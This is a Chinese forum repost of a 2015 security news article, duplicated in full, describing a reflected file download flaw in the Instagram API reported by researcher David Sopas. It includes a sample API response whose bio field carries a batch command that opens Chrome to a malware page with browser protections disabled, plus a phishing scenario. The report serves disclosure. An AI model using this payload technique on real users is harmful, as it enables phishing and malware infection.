-
-
以假乱真:利用Instagram API制造恶意分享链接
-
发表于: 2015-3-27 11:04 2032
-
新闻链接:http://netsecurity.51cto.com/art/201503/469787.htm
新闻时间:2015-03-27 10:39 JackFree FreeBuf
新闻正文:
安全研究人员最近发现了一种利用Instagram API形成的恶意分享链接,由于这个链接指向Instagram域名,所以很容易被用户相信并下载。如果在钓鱼攻击中利用该漏洞,可以极大地提高攻击效率。
以假乱真:利用Instagram API制造恶意分享链接
漏洞详情
这个RFD(反射型文件名下载)漏洞存在于Instagram API中。通过篡改任何用户账号的访问令牌并使用一些技巧,攻击者可以创建一个恶意文件下载链接。同时由于这个链接指向Instagram域名上的合法资源,所以很难被用户觉察。
“我在Instagram API上发现了一个RFD(反射型文件名下载),不需要向URL上添加任何指令,因为我们可以使用一个持久型反射域来实现它,例如用户账号上的“Bio”域。
那么,我们需要什么呢?仅仅需要一个令牌。不过不用担心,我们只需注册一个新的账号就能得到一个令牌。下一步,插入我们想在用户账号的“Bio”域(或其他域)中使用的批处理指令。接着,我将尝试用Chrome浏览器打开一个包含恶意代码的新页面,该恶意页面可以禁用该浏览器中的大多数保护机制。”
为了构建“反射型部分”,Sopas在用户账号的“Bio”域中插入了一个批处理指令,并解释说插入到其他域也可以实现同样的功能。然后,他用Chrome浏览器打开一个包含恶意代码的新页面,该恶意页面可以禁用浏览器中的大多数保护机制。
通过分析了用户的Instagram JSON文件,然后通过修改JSON文件来实现“文件名部分”:
https://api.instagram.com/v1/users/1750545056?access_token=339779002.4538cdb.fad79bd258364f4992156372fd01069a
{“meta”:{“code”:200},”data”:{“username”:”davidsopas”,”bio”:”\”||start chrome websegura.net\/malware.htm –disable-web-security –disable-popup-blocking||”,”website”:”http:\/\/websegura.net”,”profile_picture”:”https:\/\/igcdn-photos-f-a.akamaihd.net\/hphotos-ak-xaf1\/t51.2885-19\/11055505_1374264689564237_952365304_a.jpg”,”full_name”:”David Sopas”,”counts”:{“media”:0,”followed_by”:11,”follows”:3},”id”:”1750545056″}}
由于“文件名部分”的限制,这种附加方法只能在特定的浏览器中正常工作,这些浏览器包括Chrome、Opera、Chrome安卓版、安卓stock浏览器和火狐浏览器。
攻击演示视频
在他的攻击中,Sopas使用了一个特定的文件名,他创建的完整链接可以被发送到受害者的Instagram消息中。
下面的视频演示了该攻击的PoC:
Sopas假设了以下可能的攻击场景:
1、恶意用户向他所有的Instagram好友发送一条消息,其中包含一个指向恶意页面的链接。
2、受害者点击链接,检查并发现该文件存储在Instagram服务器,下载并运行它。
3、受害者感染恶意软件。
新闻时间:2015-03-27 10:39 JackFree FreeBuf
新闻正文:
安全研究人员最近发现了一种利用Instagram API形成的恶意分享链接,由于这个链接指向Instagram域名,所以很容易被用户相信并下载。如果在钓鱼攻击中利用该漏洞,可以极大地提高攻击效率。
以假乱真:利用Instagram API制造恶意分享链接
漏洞详情
这个RFD(反射型文件名下载)漏洞存在于Instagram API中。通过篡改任何用户账号的访问令牌并使用一些技巧,攻击者可以创建一个恶意文件下载链接。同时由于这个链接指向Instagram域名上的合法资源,所以很难被用户觉察。
“我在Instagram API上发现了一个RFD(反射型文件名下载),不需要向URL上添加任何指令,因为我们可以使用一个持久型反射域来实现它,例如用户账号上的“Bio”域。
那么,我们需要什么呢?仅仅需要一个令牌。不过不用担心,我们只需注册一个新的账号就能得到一个令牌。下一步,插入我们想在用户账号的“Bio”域(或其他域)中使用的批处理指令。接着,我将尝试用Chrome浏览器打开一个包含恶意代码的新页面,该恶意页面可以禁用该浏览器中的大多数保护机制。”
为了构建“反射型部分”,Sopas在用户账号的“Bio”域中插入了一个批处理指令,并解释说插入到其他域也可以实现同样的功能。然后,他用Chrome浏览器打开一个包含恶意代码的新页面,该恶意页面可以禁用浏览器中的大多数保护机制。
通过分析了用户的Instagram JSON文件,然后通过修改JSON文件来实现“文件名部分”:
https://api.instagram.com/v1/users/1750545056?access_token=339779002.4538cdb.fad79bd258364f4992156372fd01069a
{“meta”:{“code”:200},”data”:{“username”:”davidsopas”,”bio”:”\”||start chrome websegura.net\/malware.htm –disable-web-security –disable-popup-blocking||”,”website”:”http:\/\/websegura.net”,”profile_picture”:”https:\/\/igcdn-photos-f-a.akamaihd.net\/hphotos-ak-xaf1\/t51.2885-19\/11055505_1374264689564237_952365304_a.jpg”,”full_name”:”David Sopas”,”counts”:{“media”:0,”followed_by”:11,”follows”:3},”id”:”1750545056″}}
由于“文件名部分”的限制,这种附加方法只能在特定的浏览器中正常工作,这些浏览器包括Chrome、Opera、Chrome安卓版、安卓stock浏览器和火狐浏览器。
攻击演示视频
在他的攻击中,Sopas使用了一个特定的文件名,他创建的完整链接可以被发送到受害者的Instagram消息中。
下面的视频演示了该攻击的PoC:
Sopas假设了以下可能的攻击场景:
1、恶意用户向他所有的Instagram好友发送一条消息,其中包含一个指向恶意页面的链接。
2、受害者点击链接,检查并发现该文件存储在Instagram服务器,下载并运行它。
3、受害者感染恶意软件。
赞赏
他的文章
- [讨论][讨论]android加固中抽取代码是如何实现的 4437
- [讨论]android加固中抽取代码是如何实现的 3772
- [求助]android联通沃商店支付 10954
看原图
赞赏
雪币:
留言: